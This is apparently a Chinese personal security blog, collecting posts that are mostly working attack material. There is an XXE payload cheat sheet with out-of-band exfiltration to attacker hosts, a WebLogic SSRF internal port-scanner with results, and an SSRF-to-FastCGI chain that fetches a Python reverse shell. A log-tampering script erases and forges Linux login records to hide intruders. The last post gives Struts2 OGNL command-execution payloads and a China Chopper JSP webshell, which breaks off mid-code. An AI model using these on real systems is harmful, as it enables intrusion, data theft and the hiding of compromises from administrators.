XML Entity Cheatsheet - Updated

发布时间:February 22, 2016 // 分类:工作日志,开发笔记,linux,转帖文章,windows // No Comments

An XML Entity testing cheatsheet. This is an updated version with nokogiri tests removed, just (X)XE notes.

XML Headers:

<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>

Parameter Entity. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:

<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd">%dtd]>

Should be illegal per XML specs but I've seen it work, also useful for DoS:
<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>

Combined Entity and Parameter Entity:

 

<!DOCTYPE root [<!ENTITY post SYSTEM "http://"><!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]><root>&post;</root>

URL handler. This follows XML Entity - IBM (Broken) I have not used this but Public DTD works just as well:

<!DOCTYPE root [<!ENTITY c PUBLIC "-//W3C//TEXT copyright//EN" "http://[IP]/copyright.xml">]>

XML Schema Inline:

madeuptag xlmns="http://[ip]" xsi:schemaLocation="http://[IP]">
</madeuptag>

Remote Public DTD, from oxml_xxe payloads:

<!DOCTYPE roottag PUBLIC "-//OXML/XXE/EN" "http://[IP]">

External XML Stylesheet, from Burp Suite Release Notes:

<?xml-stylesheet type="text/xml" href="http://[IP]"?>

XInclude:

<document xmlns:xi="http://<IP>/XInclude"><footer><xi:include href="title.xml"/></footer></document>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>

Inline XSLT:

<?xml-stylesheet type="text/xml" href="#mytest"?>
<xsl:stylesheet id="mytest" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format">
<!-- replace with your XSLT attacks -->
<xsl:import href="http://[ip]"/>
<xsl:template match="id('boom')">
  <fo:block font-weight="bold"><xsl:apply-templates/></fo:block>
</xsl:template>
</xsl:stylesheet>

Useful Links:

XML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques
XML Entity Examples - IBM (Broken, check Internet Archive)

 

一些XXE_Payloads

https://gist.githubusercontent.com/staaldraad/01415b990939494879b4/raw/25cff41582552aee47b06526d568f5785af67deb/XXE_payloads

Vanilla, used to verify outbound xxe or blind xxe

1
2
3
4
5
6
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

 

OoB extraction

1
2
3
4
5
6
7
8
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

External dtd:

1
2
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

OoB variation of above (seems to work better against .NET)

1
2
3
4
5
6
7
8
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

External dtd:

1
2
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

OoB extra nice

1
2
3
4
5
6
7
8
9
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

External dtd:

1
<!ENTITY all "%start;%stuff;%end;">

File-not-found exception based extraction

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [  
  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
  %one;
  %two;
  %four;
]>

External dtd:

1
2
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> //you might need to encode this % (depends on your target) as: &#x25;

 

FTP

1
2
3
4
5
6
7
<?xml version="1.0" ?>
<!DOCTYPE a [ 
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

External dtd:

1
2
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

Inside SOAP body

1
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

Untested - WAF Bypass

1
2
3
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

WebLogic SSRF简易的利用脚本

发布时间:November 16, 2015 // 分类:开发笔记,代码学习,linux,python,windows // No Comments

#WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
#refer:http://blog.csdn.net/cnbird2008/article/details/45080055

这个漏洞可以对内网进行扫描.之前弄过简单的探测,时间久远就给忘记了

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
#refer:http://blog.csdn.net/cnbird2008/article/details/45080055

import re
import urlparse

def assign(service, arg):
    if service == 'www':
        return True, arg


def audit(arg):
    payload = 'uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl('"%s"' % url)
    m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException', res)
    if m:
        security_warning(url)

if __name__ == '__main__':
    from dummy import *
    audit(assign('www', 'http://www.example.com/')[1])

但是最近因为有需求.要列出内网的部分信息。于是就修改了这个脚本,方便大批量的扫描应用

#!/usr/bin/env python  
# -*- coding: utf-8 -*- 
import re
import sys
import time
import thread
import requests
 
def scan(ip_str):
    ports = ('21','22','23','53','80','135','139','443','445','1080','1433','1521','3306','3389','4899','8080','7001','8000',)
    for port in ports:
        exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
            #SSRF判断
            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)
            #丢失连接.端口连接不上
            re_sult2 = re.findall('but could not connect',response.content)

            if len(re_sult1)!=0 and len(re_sult2)==0:
                print ip_str+':'+port

        except Exception, e:
            pass
        
def find_ip(ip_prefix):
    '''
    给出当前的192.168.1 ,然后扫描整个段所有地址
    '''
    for i in range(1,256):
        ip = '%s.%s'%(ip_prefix,i)
        thread.start_new_thread(scan, (ip,))
        time.sleep(3)
     
if __name__ == "__main__":
    commandargs = sys.argv[1:]
    args = "".join(commandargs)
   
    ip_prefix = '.'.join(args.split('.')[:-1])
    find_ip(ip_prefix)

得到的结果

10.101.28.16:80
10.101.28.17:80
10.101.28.16:135
10.101.28.16:139
10.101.28.17:135
10.101.28.16:445
10.101.28.17:445
10.101.28.20:80
10.101.28.20:135
10.101.28.20:139
10.101.28.129:80
10.101.28.202:21
10.101.28.142:139
10.101.28.142:445
10.101.28.129:135
10.101.28.202:80
10.101.28.240:21
10.101.28.142:3389
10.101.28.142:7001

 

前不久尝试了一个有php+weblogic+FastCGI的挑战.我们知道SSRF+GOPHER一直都很牛逼,最近更是火热到了不要不要的地步。在drops里面有关于这个的文章http://drops.wooyun.org/tips/16357。简单的说下利用步骤

nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"
php -f gopher.php

把payload保存到x.txt。bash反弹无效,改成python来反弹。然后urlencode编码payload生成ssrf.php

shell.py

import socket,subprocess,os  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
s.connect(("yourip",9999))  
os.dup2(s.fileno(),0)  
os.dup2(s.fileno(),1)  
os.dup2(s.fileno(),2)  
p=subprocess.call(["/bin/bash","-i"]);

gopher.php

<?php
$p = str_replace("+", "%20", urlencode(file_get_contents("x.txt")));
file_put_contents("ssrf.php", "<?php header('Location: gopher://127.0.0.1:9000/_".$p."');?>");
?>

成功生成了利用文件ssrf.php

反弹shell

vps上运行监听端口

nc -lvv 9999

利用SSRF

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&amp;rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business%20location&amp;btnSubmit=Search&amp;operator=YOURIP/ssrf.php

如果利用成功则会成功反弹

1
```

调用第三方进行子域名查询

发布时间:November 8, 2015 // 分类:开发笔记,工作日志,linux,python,windows,生活琐事 // 1 Comment

因为最近都是使用的是subDomainsBrute.py对子域名进行爆破。但是三级域名的支持却不是很好。有小伙伴提示是在http://i.links.cn/subdomain/上进行查询的。于是简单的测试了下,写了一个小脚本方便查询

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import requests,re,sys

def get_domain(domain):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://i.links.cn/subdomain/",
    }
    payload = ("domain={domain}&b2=1&b3=1&b4=1".format(domain=domain))
    r = requests.post("http://i.links.cn/subdomain/", params=payload)
    file=r.text.encode('ISO-8859-1')
    regex = re.compile('value="(.+?)"><input')
    result=regex.findall(file)
    list = '\n'.join(result)
    print list

if __name__ == "__main__":
    commandargs = sys.argv[1:]
    args = "".join(commandargs)
    get_domain(args)

对比了下。还真的处了三级域名

#!/usr/bin/env python
# encoding: utf-8

import re
import sys
import json
import time
import socket
import random
import urllib
import urllib2

from bs4 import BeautifulSoup

# 随机AGENT
USER_AGENTS = [
    "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
]


def random_useragent():
    return random.choice(USER_AGENTS)

def getUrlRespHtml(url):
    respHtml=''
    try:
        heads = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 
                'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7', 
                'Accept-Language':'zh-cn,zh;q=0.5', 
                'Cache-Control':'max-age=0', 
                'Connection':'keep-alive', 
                'Keep-Alive':'115',
                'User-Agent':random_useragent()}
     
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
        urllib2.install_opener(opener) 
        req = urllib2.Request(url)
        opener.addheaders = heads.items()
        respHtml = opener.open(req).read()
    except Exception:
        pass
    return respHtml

def links_get(domain):
    trytime = 0
    #links里面得到的数据不是很全,准确率没法保证
    domainslinks = []
    try:
        req=urllib2.Request('http://i.links.cn/subdomain/?b2=1&b3=1&b4=1&domain='+domain)
        req.add_header('User-Agent',random_useragent())
        res=urllib2.urlopen(req, timeout = 30)
        src=res.read()

        TempD = re.findall('value="http.*?">',src,re.S)
        for item in TempD:
            item = item[item.find('//')+2:-2]
            #result=socket.getaddrinfo(item,None)
            #print result[0][4]
            domainslinks.append(item)
            domainslinks={}.fromkeys(domainslinks).keys()
        return domainslinks

    except Exception, e:
        pass
        trytime += 1
        if trytime > 3:
            return domainslinks

def bing_get(domain):
    trytime = 0
    f = 1
    domainsbing = []
    #bing里面获取的数据不是很完全
    while True:
        try:            
            req=urllib2.Request('http://cn.bing.com/search?count=50&q=site:'+domain+'&first='+str(f))
            req.add_header('User-Agent',random_useragent()) 
            res=urllib2.urlopen(req, timeout = 30)
            src=res.read()
            TempD=re.findall('<cite>(.*?)<\/cite>',src)
            for item in TempD:
                item=item.split('<strong>')[0]
                item += domain
                try:
                    if not (item.startswith('http://') or item.startswith('https://')):
                        item = "http://" + item
                    proto, rest = urllib2.splittype(item)
                    host, rest = urllib2.splithost(rest) 
                    host, port = urllib2.splitport(host)
                    if port == None:
                        item = host
                    else:
                        item = host + ":" + port
                except:
                     print traceback.format_exc()
                     pass                           
                domainsbing.append(item)         
            if f<500 and re.search('class="sb_pagN"',src) is not None:
                f = int(f)+50
            else:
                subdomainbing={}.fromkeys(domainsbing).keys()
                return subdomainbing
                break
        except Exception, e:
            pass
            trytime+=1
            if trytime>3:
                return domainsbing

def google_get(domain):
    trytime = 0
    s=1
    domainsgoogle=[]
    #需要绑定google的hosts
    while True:
        try:
            req=urllib2.Request('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=site:'+domain+'&rsz=8&start='+str(s))
            req.add_header('User-Agent',random_useragent()) 
            res=urllib2.urlopen(req, timeout = 30)
            src=res.read()
            results = json.loads(src)
            TempD = results['responseData']['results']
            for item in TempD:
                item=item['visibleUrl'] 
                item=item.encode('utf-8')
                domainsgoogle.append(item)                
            s = int(s)+8
        except Exception, e:
            trytime += 1
            if trytime >= 3:
                domainsgoogle={}.fromkeys(domainsgoogle).keys()
                return domainsgoogle 

def Baidu_get(domain):
    domainsbaidu=[]
    try:
        pg = 10
        for x in xrange(1,pg):
            rn=50
            pn=(x-1)*rn
            url = 'http://www.baidu.com/baidu?cl=3&tn=baidutop10&wd=site:'+domain.strip()+'&rn='+str(rn)+'&pn='+str(pn)
            src=getUrlRespHtml(url)
            soup = BeautifulSoup(src)
            html=soup.find('div', id="content_left")
            if html:
                html_doc=html.find_all('h3',class_="t")
                if html_doc:
                    for doc in html_doc:
                        href=doc.find('a')
                        link=href.get('href')
                        #需要第二次请求,从302里面获取到跳转的地址[速度很慢]
                        rurl=urllib.unquote(urllib2.urlopen(link.strip()).geturl()).strip()
                        reg='http:\/\/[^\.]+'+'.'+domain
                        match_url = re.search(reg,rurl)
                        if match_url:
                            item=match_url.group(0).replace('http://','')
                            domainsbaidu.append(item)
    except Exception, e:
        pass
        domainsbaidu={}.fromkeys(domainsbaidu).keys()

    return domainsbaidu

def get_360(domain):
    #从360获取的数据一般都是网站管理员自己添加的,所以准备率比较高。
    domains360=[]
    try:
        url = 'http://webscan.360.cn/sub/index/?url='+domain.strip()
        src=getUrlRespHtml(url)
        item = re.findall(r'\)">(.*?)</strong>',src)
        if len(item)>0:
            for i in xrange(1,len(item)):
                domains360.append(item[i])
        else:
            item = ''
            domains360.append(item)
    except Exception, e:
        pass
        domains360={}.fromkeys(domains360).keys()
    return domains360

def get_subdomain_run(domain):
    mydomains = []
    mydomains.extend(links_get(domain))
    mydomains.extend(bing_get(domain))
    mydomains.extend(Baidu_get(domain))
    mydomains.extend(google_get(domain))
    mydomains.extend(get_360(domain))
    mydomains = list(set(mydomains))

    return mydomains

if __name__ == "__main__":
   if len(sys.argv) == 2:
      print get_subdomain_run(sys.argv[1])
      sys.exit(0)
   else:
       print ("usage: %s domain" % sys.argv[0])
       sys.exit(-1)

 

python mysubdomain.py wooyun.org
['www.wooyun.org', 'zone.wooyun.org', 'summit.wooyun.org', 'ce.wooyun.org', 'drops.wooyun.org', 'wooyun.org', 'wiki.wooyun.org', 'z.wooyun.org', 'job.wooyun.org', 'zhuanlan.wooyun.org', 'www2d00.wooyun.org', 'test.wooyun.org', 'en.wooyun.org', 'api.wooyun.org', 'paper.wooyun.org', 'edu.wooyun.org']

2016.1.28增加百度与360搜索抓取

python mysubdomain.py jd.cn

['temp1.jd.cn', 'ngb.jd.cn', 'www.fy.jd.cn', 'dangan.jd.cn', 'rd.jd.cn', 'bb.jd.cn', 'www.jd.cn', 'bjxc.jd.cn', 'www.xnz.jd.cn', 'jw.jd.cn', 'www.gsj.jd.cn', 'www.wuqiao.jd.cn', 'nlj.jd.cn', 'czj.jd.cn', 'www.smj.jd.cn', 'zfrx.jd.cn', 'www.jjjc.jd.cn', 'gtj.jd.cn', 'bbs.jd.cn', 'hbcy.jd.cn', 'lcsq.xnz.jd.cn', 'jtj.jd.cn', 'www.nkj.jd.cn', 'zx.jd.cn', 'www.daj.jd.cn', 'www.hbcy.jd.cn', 'slj.jd.cn', 'kfq.jd.cn', 'www.jxw.jd.cn', 'jwxxw.jd.cn', 'www.kx.jd.cn', 'qxj.jd.cn', 'www.sjj.jd.cn', 'www.jfw.jd.cn', 'www.dqz.jd.cn', 'yl.jd.cn', 'www.tw.jd.cn', 'www.qxj.jd.cn', 'www.dwzw.jd.cn', 'www.czj.jd.cn', 'www.ajj.jd.cn', 'www.gxs.jd.cn', 'www.dx.jd.cn', 'sjj.jd.cn', 'www.jtj.jd.cn', 'www.wjj.jd.cn', 'www.mzj.jd.cn', 'www.cgj.jd.cn', 'jsj.jd.cn', 'www.dangan.jd.cn', 'www.wlj.jd.cn', 'www.mj.jd.cn', 'www.zwz.jd.cn', 'www.sf.jd.cn', 'www.sbz.jd.cn', 'www.cl.jd.cn', 'fzb.jd.cn', 'ajj.jd.cn', 'www.rsj.jd.cn', 'www.jdz.jd.cn', 'www.xh.jd.cn', 'qzlxjysj.jd.cn', 'www.wjmj.jd.cn', 'www.sbdw.jd.cn', 'www.flower.jd.cn', 'www.kjj.jd.cn', 'www.yjj.jd.cn', 'wjj.jd.cn', 'jdz.jd.cn', 'www.cb.jd.cn', 'www.ptz.jd.cn', 'nkj.jd.cn', '333.jd.cn', 'www.dxs.jd.cn', 'www.cxy.jd.cn', 'www.wjz.jd.cn', 'www.fzb.jd.cn', 'login.jd.cn', 'ldj.jd.cn', 'jfw.jd.cn', 'www.zfcg.jd.cn', 'www.kfq.jd.cn', 'www.dhz.jd.cn', 'www.zfrx.jd.cn', 'www.rd.jd.cn', 'dxs.jd.cn', 'jggw.jd.cn', 'www.yilin.jd.cn', 'www.tjj.jd.cn', 'www.zfw.jd.cn', 'g.jd.cn', 'www.rc.jd.cn', 'yfsq.xnz.jd.cn', 'www.wqz.jd.cn', 'zfcg.jd.cn', 'fgj.jd.cn', 'hbj.jd.cn', 'fgw.jd.cn', 'www.acd.jd.cn', 'sfj.jd.cn', 'www.zx.jd.cn', 'kx.jd.cn', 'www.ylz.jd.cn', 'www.zhenwu.jd.cn', 'fcz.jd.cn', 'tjj.jd.cn', 'kjj.jd.cn', 'gjj.jd.cn', 'cl.jd.cn', 'www.njj.jd.cn', 'www.slj.jd.cn', 'www.ldj.jd.cn', 'www.jsj.jd.cn', 'zfw.jd.cn', 'news.jd.cn', 'tw.jd.cn', 'www.dgz.jd.cn', 'yjj.jd.cn', 'njj.jd.cn', 'www.jggw.jd.cn', 'www.gjj.jd.cn', 'www.kp.jd.cn', 'www.qx.jd.cn', 'lsj.jd.cn', 'www.hbj.jd.cn', 'www.gcz.jd.cn', 'rc.jd.cn', 'jd.cn', 'jgj.jd.cn', 'jjjc.jd.cn', 'www.wsj.jd.cn', 'rsj.jd.cn', 'www.syb.jd.cn', 'files.jd.cn', 'www.jgj.jd.cn', 'www.xjz.jd.cn', 'fkb.jd.cn', 'qx.jd.cn', 'gsl.jd.cn', 'ptz.jd.cn', 'zzb.jd.cn', 'www.zjj.jd.cn', 'www.rfb.jd.cn', 'cb.jd.cn', 'www.fgj.jd.cn', 'www.da.jd.cn', 'www.lsj.jd.cn', 'www.fcz.jd.cn', 'www.ngb.jd.cn', 'www.sbzs.jd.cn', 'sf.jd.cn', 'www.jsw.jd.cn']

 

python修改linux日志(logtamper.py)

发布时间:September 28, 2015 // 分类:开发笔记,linux,代码学习,转帖文章,python,生活琐事 // 1 Comment

    经常用到xi4oyu大神的logtamper,非常之方便。但是有些场景下可能没条件编译、于是参照logtamper源码以及Intersect的源码写了个py版,参数和原版差不多。

躲避管理员w查看

python logtamper.py -m 1 -u b4dboy -i 192.168.0.188

清除指定ip的登录日志

python logtamper.py -m 2 -u b4dboy -i 192.168.0.188

修改上次登录时间地点

python logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12

最后自己再确认下看有没有修改成功,可以使用chown、touch命令修改时间和使用者,程序代码如下:

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# mail: cn.b4dboy@gmail.com
 
import os, struct, sys
from pwd import getpwnam
from time import strptime, mktime
from optparse import OptionParser
 
UTMPFILE = "/var/run/utmp"
WTMPFILE = "/var/log/wtmp"
LASTLOGFILE = "/var/log/lastlog"
 
LAST_STRUCT = 'I32s256s'
LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)
 
XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'
XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)
 
 
def getXtmp(filename, username, hostname):
    xtmp = ''
    try:
        fp = open(filename, 'rb')
        while True:
            bytes = fp.read(XTMP_STRUCT_SIZE)
            if not bytes:
                break
 
            data = struct.unpack(XTMP_STRUCT, bytes)
            record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]
            if (record[4] == username and record[5] == hostname):
                continue
            xtmp += bytes
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return xtmp
 
 
def modifyLast(filename, username, hostname, ttyname, strtime):
    try:
        p = getpwnam(username)
    except:
        showMessage('No such user.')
 
    timestamp = 0
    try:
        str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')
        timestamp = int(mktime(str2time))
    except:
        showMessage('Time format err.')
 
    data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)
    try:
        fp = open(filename, 'wb')
        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)
        fp.write(data)
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return True
 
 
def showMessage(msg):
    print msg
    exit(-1)
 
 
def saveFile(filename, contents):
    try:
        fp = open(filename, 'w+b')
        fp.write(contents)
    except IOError as e:
        showMessage(e)
    finally:
        fp.close()
 
 
if __name__ == '__main__':
    usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \
        logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'
    parser = OptionParser(usage=usage)
    parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')
    parser.add_option('-t', '--ttyname', dest='TTYNAME')
    parser.add_option('-f', '--filename', dest='FILENAME')
    parser.add_option('-u', '--username', dest='USERNAME')
    parser.add_option('-i', '--hostname', dest='HOSTNAME')
    parser.add_option('-d', '--dateline', dest='DATELINE')
    (options, args) = parser.parse_args()
 
    if len(args) < 3:
        if options.MODE == '1':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
 
            if options.FILENAME == None:
                options.FILENAME = UTMPFILE
 
            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)
 
        elif options.MODE == '2':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
 
            if options.FILENAME == None:
                options.FILENAME = WTMPFILE
 
            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)
 
        elif options.MODE == '3':
            if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
 
            if options.FILENAME == None:
                options.FILENAME = LASTLOGFILE
 
            # tamper
            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)
 
        else:
            parser.print_help()

from:http://www.secoff.net/archives/475.html

struts2 debug开启可执行ognl

发布时间:September 25, 2015 // 分类:运维工作,开发笔记,linux,windows,python,生活琐事 // No Comments

1.测试是否存在

debug=command&expression=%23f%3d%23_memberAccess.getClass().getDeclaredField(%27allowStaticM%27%2b%27ethodAccess%27),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),%23o%3d@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23o.println(%27[%27%2b%27ok%27%2b%27]%27),%23o.close()

2. 尝试执行命令

debug=command&expression=new%20java.io.BufferedReader(new%20java.io.InputStreamReader(new%20java.lang.ProcessBuilder({%27id%27}).start().getInputStream())).readLine()

3.获取相关路径

debug=command&expression=%23f=%23_memberAccess.getClass().getDeclaredField(%27allowStaticMethodAccess%27),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23e=%23req.getRealPath(%27%27),%23resp.println(%23e),%23resp.close()

4.写shell~wget或者curl都可以。这里提供一个写shell方式

cmd /c echo ^<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%^> ^<%! String Pwd="chopper"; String EC(String s,String c)throws Exception{return new String(s.getBytes("ISO-8859-1"),c);} Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); Connection c=DriverManager.getConnection(x[1].trim());if(x.length^>2){c.setCatalog(x[2].trim());}return c;} void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i^<r.length;i++){sb.append(r[i].toString().substring(0,2));}} void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt; SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i^<l.length;i++){dt=new java.util.Date(l[i].lastModified()); sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");} else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);} void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles(); for(int k=0;k^<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();} void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset(); ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s)); os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); FileOutputStream os=new FileOutputStream(f);for(int i=0;i^<d.length();i+=2) {os.write((h.indexOf(d.charAt(i))^<^<4^|h.indexOf(d.charAt(i+1))));}os.close();} void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles(); for(int j=0;j^<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());} }else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df); int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}} void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();} void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());} void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d); HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512]; while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();} void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is)); while((l=br.readLine())!=null){sb.append(l+"\r\n");}} void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs(); while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();} void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t); while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();} void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s); Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData(); for(int i=1;i^<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();} void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008); try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i^<=n;i++){sb.append(d.getColumnName(i)+"\t|\t"); }sb.append("\r\n");while(r.next()){for(i=1;i^<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();} catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n"); }catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();} %^>^<% String 